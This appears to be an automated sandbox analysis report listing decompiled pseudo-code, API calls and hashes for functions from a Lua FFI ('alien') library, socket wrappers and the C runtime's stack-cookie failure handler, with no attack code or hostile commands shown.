Instruction Fuzzy Hash: A2C01274D0020097FE0097689D58A473668BB44206FC18460F549C6101D339E5648621

Uniqueness

Uniqueness Score: -1.00%

Function 00A24130, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00A24130(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				void* __esi;
				signed int _t22;
				void* _t26;
				intOrPtr _t29;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				intOrPtr* _t50;
				signed int _t51;
				intOrPtr _t52;
				void* _t61;

				_t61 = __fp0;
				_t49 = __edi;
				_t46 = __edx;
				_t38 = __ebx;
				_t22 =  *0xa270f8; // 0x48cba2b9
				_v8 = _t22 ^ _t51;
				_t39 = _a12;
				_t50 = _a4;
				_v20 = _t50;
				_v12 = _a16;
				if(_t39 == 0) {
					_t35 =  *((intOrPtr*)(_t50 + 0xc));
					if( *((short*)( *((intOrPtr*)(_t50 + 0xc)) + 6)) == 0xd) {
						E00A24670( *_t35);
						_t39 = _t52;
					}
				}
				_t26 =  *_t50 - 1;
				_v16 = _t39;
				if(_t26 == 0) {
					_t47 =  *((intOrPtr*)(_t50 + 0x10));
					_t29 = E00A244B0( *((intOrPtr*)(_t50 + 0x10)), _t61, E00A24000,  &_v20,  *((intOrPtr*)(_t50 + 0x10)),  *((intOrPtr*)(_t50 + 0x14)), _t39, _a8);
					goto L8;
				} else {
					_t31 = _t26 == 1;
					if(_t26 == 1) {
						_t47 =  &_v20;
						_t29 = E00A24530( &_v20, _t61, E00A24000,  &_v20,  *((intOrPtr*)(_t50 + 0x10)),  *((intOrPtr*)(_t50 + 0x14)), _t39, _a8); // executed
						L8:
						return E00A245A4(_t29, _t38, _v8 ^ _t51, _t47, _t49, _t50);
					} else {
						return E00A245A4(_t31 | 0xffffffff, _t38, _v8 ^ _t51, _t46, _t49, _t50);
					}
				}
			}

0x00a24130
0x00a24130
0x00a24130
0x00a24130
0x00a24136
0x00a2413d
0x00a24140
0x00a24149
0x00a2414c
0x00a2414f
0x00a24152
0x00a24154
0x00a2415c
0x00a24160
0x00a24165
0x00a24165
0x00a2415c
0x00a24169
0x00a2416c
0x00a2416f
0x00a241ab
0x00a241be
0x00000000
0x00a24171
0x00a24171
0x00a24174
0x00a24198
0x00a241a1
0x00a241c3
0x00a241d7
0x00a24176
0x00a2418a
0x00a2418a
0x00a24174

APIs

__alloca_probe_16.LIBCMT ref: 00A24160

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: __alloca_probe_16
String ID:
API String ID: 1700504859-0
Opcode ID: 626739309b3c4a2350ac44da25ade9ecbafc8c10cf0e9d29072c25b2689aa507
Instruction ID: 67dd37c2b72e9f587795c7fbb5eece8a15cc5f54607acb6fb0e02cadb2bd531a
Opcode Fuzzy Hash: 626739309b3c4a2350ac44da25ade9ecbafc8c10cf0e9d29072c25b2689aa507
Instruction Fuzzy Hash: B8211D71A14228AF8B14DF9CE941CBAB7B8EF4C710B10466DF91697640D770AD54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A24530, Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(?,?,?,?,?,?), ref: 00A24547

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: a56498a0fc00db268cc4ca3ba56001d16f6723e786e9ecfbfb4e97c053602a31
Instruction ID: d366d4ea48b0c3a508d7c0b1d17c7f0b41a9645a753ba2fdbd2e80d48943b444
Opcode Fuzzy Hash: a56498a0fc00db268cc4ca3ba56001d16f6723e786e9ecfbfb4e97c053602a31
Instruction Fuzzy Hash: B3011770A00129CB8F24CF1CE59147A3B75EF5E769F604069E98647650DB32ACA5CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF30, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de54bbb90ab78c8e55105ab457e6d8560ead02b127befd035c30462d06efedc7
Instruction ID: 2d3a3d9fe104f74d3818c964718e5ee43ea6ffac2327e221b31309972910aa48
Opcode Fuzzy Hash: de54bbb90ab78c8e55105ab457e6d8560ead02b127befd035c30462d06efedc7
Instruction Fuzzy Hash: 1CF08C307002109FE301CB24CC84B9A7BE2EF85344F45C598F5498B6E1C779A882CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00994210, Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(?,?,?), ref: 0099421F

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: socket
String ID:
API String ID: 98920635-0
Opcode ID: fbba4dcc111e41512713b93f415d40af3fd87ca12086c811d7e0dde8fd374e3f
Instruction ID: fce43103c43105f7dd187cd270ea38a5fd0d320a2d13d0817481bd6f72cae144
Opcode Fuzzy Hash: fbba4dcc111e41512713b93f415d40af3fd87ca12086c811d7e0dde8fd374e3f
Instruction Fuzzy Hash: 6AD067B5159201EF8A15DF28C890C2B73A6EBC5760F148E59F56586294D731D8029B21

Uniqueness

Uniqueness Score: -1.00%

Function 10016220, Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000000,100161D3,?,?), ref: 10016226

Part of subcall function 10016250: GetLastError.KERNEL32(00000000), ref: 10016257
Part of subcall function 10016250: FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,00000080,00000000), ref: 10016275
Part of subcall function 10016250: lua_pushstring.LUA5.1(?,?), ref: 1001628C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastLibraryLoadMessagelua_pushstring.
String ID:
API String ID: 1215009581-0
Opcode ID: 57bade8ad037d40cf2c42a6c848cb89017062f08cbe0b3c53fe425362482aefa
Instruction ID: 78dd9c13bc6241ba384ff8529d6eab9b4ec78fa08307d183acae3083e553a454
Opcode Fuzzy Hash: 57bade8ad037d40cf2c42a6c848cb89017062f08cbe0b3c53fe425362482aefa
Instruction Fuzzy Hash: B1C012BAA0473267C622D7A8FC5498B7A94EB8C2E0B024514F9499B310DA34DC80C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 009941B0, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E009941B0(intOrPtr* _a4) {
				void* _t2;
				intOrPtr _t4;
				intOrPtr* _t5;

				_t5 = _a4;
				if( *_t5 != 0xffffffff) {
					E00994630(_t5);
					_t4 =  *_t5;
					_push(_t4); // executed
					L00994A5E(); // executed
					 *_t5 = 0xffffffff;
					return _t4;
				}
				return _t2;
			}

0x009941b1
0x009941b8
0x009941bb
0x009941c0
0x009941c5
0x009941c6
0x009941cb
0x00000000
0x009941cb
0x009941d2

APIs

Part of subcall function 00994630: ioctlsocket.WSOCK32(?,8004667E,00000002), ref: 0099464A

closesocket.WSOCK32(00000000), ref: 009941C6

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: closesocketioctlsocket
String ID:
API String ID: 2526268228-0
Opcode ID: 4aac4fedb2a6a86fb7685f7399a00253db9fdd49b268d8b1aad2173850e90f11
Instruction ID: ef41f1e7d23e7eff970c3b81638305aa38b1e8d9d29871dc769235f49bc02178
Opcode Fuzzy Hash: 4aac4fedb2a6a86fb7685f7399a00253db9fdd49b268d8b1aad2173850e90f11
Instruction Fuzzy Hash: 05D012B040552297CD216F2CAC41C4B73985E423347240B18F4F8576D4D73059D78BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00994630, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00994630(intOrPtr* _a4) {
				intOrPtr _v4;
				void* _t3;
				void* _t6;

				_t3 = _t6;
				_push(_t3);
				_push(0x8004667e);
				_v4 = 0;
				_push( *_a4); // executed
				L00994AA6(); // executed
				return _t3;
			}

0x00994635
0x00994639
0x0099463a
0x00994641
0x00994649
0x0099464a
0x00994650

APIs

ioctlsocket.WSOCK32(?,8004667E,00000002), ref: 0099464A

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 714e6c2cc0c7f08bf0a4802a16e0e180e9eaacf29be5373def8b468b127294bf
Instruction ID: e1ee2b9e8679790212a116dd941bbf297dd9d92d376dac1290492a4f28c4be68
Opcode Fuzzy Hash: 714e6c2cc0c7f08bf0a4802a16e0e180e9eaacf29be5373def8b468b127294bf
Instruction Fuzzy Hash: 52C012B4108202AFC614CB14C880F2BB7A9ABC4348F20880CF18946270CA30A4598B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00994660, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00994660(intOrPtr* _a4) {
				intOrPtr _v4;
				void* _t3;
				void* _t6;

				_t3 = _t6;
				_push(_t3);
				_push(0x8004667e);
				_v4 = 1;
				_push( *_a4); // executed
				L00994AA6(); // executed
				return _t3;
			}

0x00994665
0x00994669
0x0099466a
0x00994671
0x00994679
0x0099467a
0x00994680

APIs

ioctlsocket.WSOCK32(?,8004667E,00000000), ref: 0099467A

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: d6897b57cc25738280dae354cd98ec04d7e5afbedfd3746b1a567c451c05e740
Instruction ID: fbe0f126e3edea7392a4bf9411aed0a4af357fcacdd2d9402ce85e51ae7e029b
Opcode Fuzzy Hash: d6897b57cc25738280dae354cd98ec04d7e5afbedfd3746b1a567c451c05e740
Instruction Fuzzy Hash: 52C012B4108202AFCA14CB14C880E2BB7AAABC4348F20880CF18946270CA30A4998B16

Uniqueness

Uniqueness Score: -1.00%

Function 009946C0, Relevance: 1.5, APIs: 1, Instructions: 10
networkCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E009946C0(intOrPtr* _a4) {
				intOrPtr* _t3;

				_t3 = _a4;
				_push(_t3); // executed
				L00994AB2(); // executed
				 *_a4 = _t3;
				if(_t3 == 0) {
					return __imp__#111();
				}
				return 0;
			}

0x009946c0
0x009946c4
0x009946c5
0x009946d0
0x009946d2
0x00994a52
0x00994a52
0x009946d6

APIs

gethostbyname.WSOCK32(?), ref: 009946C5

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: gethostbyname
String ID:
API String ID: 930432418-0
Opcode ID: 09b349199599ee7df518aaae925b2f974e09c1e5de50d459b7a7baf72a3a857a
Instruction ID: def964f8da67f77267b4fb90d2cddfb65fc263ce7b2d75eac79f40f861f7ec97
Opcode Fuzzy Hash: 09b349199599ee7df518aaae925b2f974e09c1e5de50d459b7a7baf72a3a857a
Instruction Fuzzy Hash: C3C04CB1246241AB8F529A78C954E1A77E87B85741B144C687249C6150EA35D842AB15

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A245A4, Relevance: 10.6, APIs: 7, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A245A4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t32;

				_t25 = __esi;
				_t24 = __edi;
				_t23 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t32 = _t20 -  *0xa270f8; // 0x48cba2b9
				if(_t32 == 0) {
					asm("repe ret");
				}
				 *0xa27218 = _t6;
				 *0xa27214 = _t20;
				 *0xa27210 = _t23;
				 *0xa2720c = _t19;
				 *0xa27208 = _t25;
				 *0xa27204 = _t24;
				 *0xa27230 = ss;
				 *0xa27224 = cs;
				 *0xa27200 = ds;
				 *0xa271fc = es;
				 *0xa271f8 = fs;
				 *0xa271f4 = gs;
				asm("pushfd");
				_pop( *0xa27228);
				 *0xa2721c =  *_t29;
				 *0xa27220 = _v0;
				 *0xa2722c =  &_a4;
				 *0xa27168 = 0x10001;
				_t11 =  *0xa27220; // 0x0
				 *0xa2711c = _t11;
				 *0xa27110 = 0xc0000409;
				 *0xa27114 = 1;
				_t12 =  *0xa270f8; // 0x48cba2b9
				_v812 = _t12;
				_t13 =  *0xa270fc; // 0xb7345d46
				_v808 = _t13;
				 *0xa27160 = IsDebuggerPresent();
				_push(1);
				L00A24EE8();
				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(0xa25b08);
				if( *0xa27160 == 0) {
					_push(1);
					L00A24EE8();
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00a245a4
0x00a245a4
0x00a245a4
0x00a245a4
0x00a245a4
0x00a245a4
0x00a245a4
0x00a245aa
0x00a245ac
0x00a245ac
0x00a249fe
0x00a24a03
0x00a24a09
0x00a24a0f
0x00a24a15
0x00a24a1b
0x00a24a21
0x00a24a28
0x00a24a2f
0x00a24a36
0x00a24a3d
0x00a24a44
0x00a24a4b
0x00a24a4c
0x00a24a55
0x00a24a5d
0x00a24a65
0x00a24a70
0x00a24a7a
0x00a24a7f
0x00a24a84
0x00a24a8e
0x00a24a98
0x00a24a9d
0x00a24aa3
0x00a24aa8
0x00a24ab4
0x00a24ab9
0x00a24abb
0x00a24ac3
0x00a24ace
0x00a24adb
0x00a24add
0x00a24adf
0x00a24ae4
0x00a24af8

APIs

IsDebuggerPresent.KERNEL32 ref: 00A24AAE
_crt_debugger_hook.MSVCR80(00000001), ref: 00A24ABB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A24AC3
UnhandledExceptionFilter.KERNEL32(00A25B08), ref: 00A24ACE
_crt_debugger_hook.MSVCR80(00000001), ref: 00A24ADF
GetCurrentProcess.KERNEL32(C0000409), ref: 00A24AEA
TerminateProcess.KERNEL32(00000000), ref: 00A24AF1

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: e29ba85a0757912b58a655bef0e812e37754984797e97d21204b604f05403cd5
Instruction ID: b85c9baae077aee63381dc56b9943398a82aef5bec35c0f279dde54ade90a355
Opcode Fuzzy Hash: e29ba85a0757912b58a655bef0e812e37754984797e97d21204b604f05403cd5
Instruction Fuzzy Hash: 7521BEB4909204DFD721DFACFC46AB83BA4BB08310F104579F51886271E7B09B878F96

Uniqueness

Uniqueness Score: -1.00%

Function 00A21080, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00A21080(char __edi) {
				signed int _v4;
				char _v132;
				void* __esi;
				signed int _t6;
				intOrPtr _t13;
				intOrPtr _t19;
				long _t21;

				_t22 =  &_v132;
				_t6 =  *0xa270f8; // 0x48cba2b9
				_v4 = _t6 ^  &_v132;
				_t21 = GetLastError();
				if(FormatMessageA(0x1200, 0, _t21, 0,  &_v132, 0x80, 0) == 0) {
					_push(_t21);
					_push("system error %d\n");
					L00A23EEA();
					return E00A245A4(_t10, _t13, _v4 ^  &(_t22[0xc]), _t19, __edi, _t21, __edi);
				} else {
					_push( &_v132);
					L00A23EF0();
					return E00A245A4(_t10, _t13, _v4 ^  &(_t22[8]), _t19, __edi, _t21, __edi);
				}
			}

0x00a21080
0x00a21086
0x00a2108d
0x00a210a2
0x00a210bb
0x00a210e1
0x00a210e2
0x00a210e8
0x00a21105
0x00a210bd
0x00a210c1
0x00a210c3
0x00a210e0
0x00a210e0

APIs

GetLastError.KERNEL32(00000000), ref: 00A21095
FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,00000080,00000000), ref: 00A210B3
lua_pushstring.LUA5.1(?,?), ref: 00A210C3
lua_pushfstring.LUA5.1(?,system error %d,00000000), ref: 00A210E8

Strings

system error %d, xrefs: 00A210E2

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessagelua_pushfstring.lua_pushstring.
String ID: system error %d
API String ID: 1488786958-1688351658
Opcode ID: 16a3651c4742c15d3945c921f3d0103895b084ce4d546fae00b5e319839f6203
Instruction ID: 704688d175ecb9d1a1b580705c33ba5818e8683c481260a3f719197a28c3ef8e
Opcode Fuzzy Hash: 16a3651c4742c15d3945c921f3d0103895b084ce4d546fae00b5e319839f6203
Instruction Fuzzy Hash: B0F0C231A042206BE634A768AC53FBF3394BF89710F808428FA89891C1EE79590983D7

Uniqueness

Uniqueness Score: -1.00%

Function 00402403, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402403() {

				SetUnhandledExceptionFilter(E004023C6);
				return 0;
			}

0x00402408
0x00402410

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000023C6), ref: 00402408

Memory Dump Source

Source File: 00000003.00000002.481771819.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.481676145.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481875011.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.481973747.0000000000405000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8a6f111c12c60c1f4ccb9f048a89fcac1ef79f947685ad4e7fc46fb9e148ee6c
Instruction ID: 55b01f16997e6df97f95089a92c059a30194a49be1b8f15504aa6d91282e94f9
Opcode Fuzzy Hash: 8a6f111c12c60c1f4ccb9f048a89fcac1ef79f947685ad4e7fc46fb9e148ee6c
Instruction Fuzzy Hash: 4E9002A027250096C6102F705E0E60529986AC862376154716405E40D8DBB84654AA69

Uniqueness

Uniqueness Score: -1.00%

Function 00A21B60, Relevance: 72.0, APIs: 31, Strings: 10, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00A21B60(intOrPtr _a4) {
				intOrPtr _v4;
				void* __ebx;
				void* __esi;
				void* _t62;
				signed int _t63;
				void* _t64;
				void* _t67;
				signed int _t71;
				void* _t72;
				signed int _t75;
				signed int _t98;
				intOrPtr _t99;
				void* _t100;
				signed int _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t117;

				_t99 = _a4;
				_t63 = E00A21110(_t62, 1, _t99, "alien_function");
				_t100 = 0;
				_t103 = _t102 + 4;
				if(_t63 == 0) {
					_t63 = E00A21110(_t63, 1, _t99, "alien_callback");
					_t104 = _t103 + 4;
					if(_t63 == 0) {
						_push("alien function or callback expected");
						_push(1);
						_push(_t99);
						L00A23F14();
						_t104 = _t104 + 0xc;
						_t98 = 0;
					} else {
						_t63 =  *_t63;
						_t98 =  *(_t63 + 0x18);
					}
				} else {
					_t98 = _t63;
				}
				_push(2);
				_push(_t99);
				L00A23F4A();
				_t105 = _t104 + 8;
				if(_t63 != 5) {
					_push(0xa254a8);
					_push("int");
					_push(2);
					_push(_t99);
					L00A23F98();
					 *((intOrPtr*)(_t98 + 0xc)) =  *((intOrPtr*)(0xa25460 + _t63 * 4));
					_t106 = _t105 + 0x10;
					 *((intOrPtr*)(_t98 + 0x28)) =  *((intOrPtr*)(0xa27000 + _t63 * 4));
					_v4 = 1;
				} else {
					_push("ret");
					_push(2);
					_push(_t99);
					L00A23F02();
					_push(0xa254a8);
					_push("int");
					_push(0xffffffff);
					_push(_t99);
					L00A23F98();
					_push("abi");
					 *((intOrPtr*)(_t98 + 0xc)) =  *((intOrPtr*)(0xa25460 + _t63 * 4));
					_push(2);
					_push(_t99);
					 *((intOrPtr*)(_t98 + 0x28)) =  *((intOrPtr*)(0xa27000 + _t63 * 4));
					L00A23F02();
					_push(0xa2532c);
					_push("default");
					_push(0xffffffff);
					_push(_t99);
					L00A23F98();
					_push(0xfffffffd);
					_push(_t99);
					_v4 =  *((intOrPtr*)(0xa25320 + _t63 * 4));
					L00A23EF6();
					_t106 = _t105 + 0x40;
				}
				_t64 =  *(_t98 + 0x30);
				if(_t64 != _t100) {
					free(_t64);
					_t64 =  *(_t98 + 0x34);
					free(_t64);
					_t106 = _t106 + 8;
					 *(_t98 + 0x30) = _t100;
					 *(_t98 + 0x34) = _t100;
				}
				_push(2);
				_push(_t99);
				L00A23F4A();
				_t107 = _t106 + 8;
				if(_t64 != 5) {
					_push(_t99);
					L00A23F38();
					_t108 = _t107 + 4;
					_t64 = _t64 - 2;
				} else {
					_push(2);
					_push(_t99);
					L00A23F9E();
					_t108 = _t107 + 8;
				}
				 *(_t98 + 0x2c) = _t64;
				if(_t64 <= _t100) {
					 *(_t98 + 0x34) = _t100;
					 *(_t98 + 0x30) = _t100;
				} else {
					_t72 = malloc(_t64 * 4);
					_t117 = _t108 + 4;
					 *(_t98 + 0x34) = _t72;
					if(_t72 == _t100) {
						_push("alien: out of memory");
						_push(_t99);
						L00A23F26();
						_t117 = _t117 + 8;
					}
					_t64 = malloc( *(_t98 + 0x2c) +  *(_t98 + 0x2c) +  *(_t98 + 0x2c) +  *(_t98 + 0x2c));
					_t108 = _t117 + 4;
					 *(_t98 + 0x30) = _t64;
					if(_t64 == _t100) {
						_push("alien: out of memory");
						_push(_t99);
						L00A23F26();
						_t108 = _t108 + 8;
					}
				}
				_push(2);
				_push(_t99);
				L00A23F4A();
				_t109 = _t108 + 8;
				_t75 = 0;
				if(_t64 != 5) {
					if( *(_t98 + 0x2c) > _t100) {
						do {
							_push(0xa254a8);
							_push("int");
							_t44 = _t75 + 3; // 0x3
							_t71 = _t44;
							_push(_t71);
							_push(_t99);
							L00A23F98();
							 *((intOrPtr*)( *(_t98 + 0x34) + _t75 * 4)) =  *((intOrPtr*)(0xa27000 + _t71 * 4));
							 *((intOrPtr*)( *(_t98 + 0x30) + _t75 * 4)) =  *((intOrPtr*)(0xa25460 + _t71 * 4));
							_t75 = _t75 + 1;
							_t109 = _t109 + 0x10;
						} while (_t75 <  *(_t98 + 0x2c));
					}
				} else {
					if( *(_t98 + 0x2c) > _t100) {
						do {
							_t31 = _t75 + 1; // 0x1
							_t101 = _t31;
							_push(_t101);
							_push(2);
							_push(_t99);
							L00A23F86();
							_push(0xa254a8);
							_push("int");
							_push(0xffffffff);
							_push(_t99);
							L00A23F98();
							_push(0xa254a8);
							_push("int");
							_push(0xffffffff);
							_push(_t99);
							 *((intOrPtr*)( *(_t98 + 0x34) + _t75 * 4)) =  *((intOrPtr*)(0xa27000 + _t64 * 4));
							L00A23F98();
							_push(0xfffffffe);
							_push(_t99);
							 *((intOrPtr*)( *(_t98 + 0x30) + _t75 * 4)) =  *((intOrPtr*)(0xa25460 + _t64 * 4));
							L00A23EF6();
							_t75 = _t101;
							_t109 = _t109 + 0x34;
						} while (_t75 <  *(_t98 + 0x2c));
						_t100 = 0;
					}
				}
				_t60 = _t98 + 0x10; // 0x10
				_t76 = _t60;
				_t67 = E00A24400(_t60, _v4,  *(_t98 + 0x2c),  *((intOrPtr*)(_t98 + 0x28)),  *(_t98 + 0x34));
				_t110 = _t109 + 0x14;
				if(_t67 != 0) {
					_push("alien: error in libffi preparation");
					_push(_t99);
					L00A23F26();
					_t110 = _t110 + 8;
				}
				_push(1);
				_push(_t99);
				L00A23F0E();
				if(_t67 == _t100) {
					L34:
					return 0;
				} else {
					_push(1);
					_push(_t99);
					L00A23F08();
					if(_t67 == 0) {
						goto L34;
					} else {
						_push("alien_callback");
						_push(0xffffd8f0);
						_push(_t99);
						L00A23F02();
						_push(0xfffffffe);
						_push(0xffffffff);
						_push(_t99);
						L00A23EFC();
						_push(0xfffffffd);
						_push(_t99);
						if(_t67 != 0) {
							L00A23EF6();
							if(E00A24310( *((intOrPtr*)(_t98 + 4)), _t76, E00A214C0, _t98) != 0) {
								_push("alien: cannot create callback");
								_push(_t99);
								L00A23F26();
							}
							goto L34;
						} else {
							L00A23EF6();
							return 0;
						}
					}
				}
			}

0x00a21b64
0x00a21b73
0x00a21b78
0x00a21b7a
0x00a21b7f
0x00a21b8a
0x00a21b8f
0x00a21b94
0x00a21b9d
0x00a21ba2
0x00a21ba4
0x00a21ba5
0x00a21baa
0x00a21bad
0x00a21b96
0x00a21b96
0x00a21b98
0x00a21b98
0x00a21b81
0x00a21b81
0x00a21b81
0x00a21baf
0x00a21bb1
0x00a21bb2
0x00a21bb7
0x00a21bbd
0x00a21c29
0x00a21c2e
0x00a21c33
0x00a21c35
0x00a21c36
0x00a21c42
0x00a21c4c
0x00a21c4f
0x00a21c52
0x00a21bbf
0x00a21bbf
0x00a21bc4
0x00a21bc6
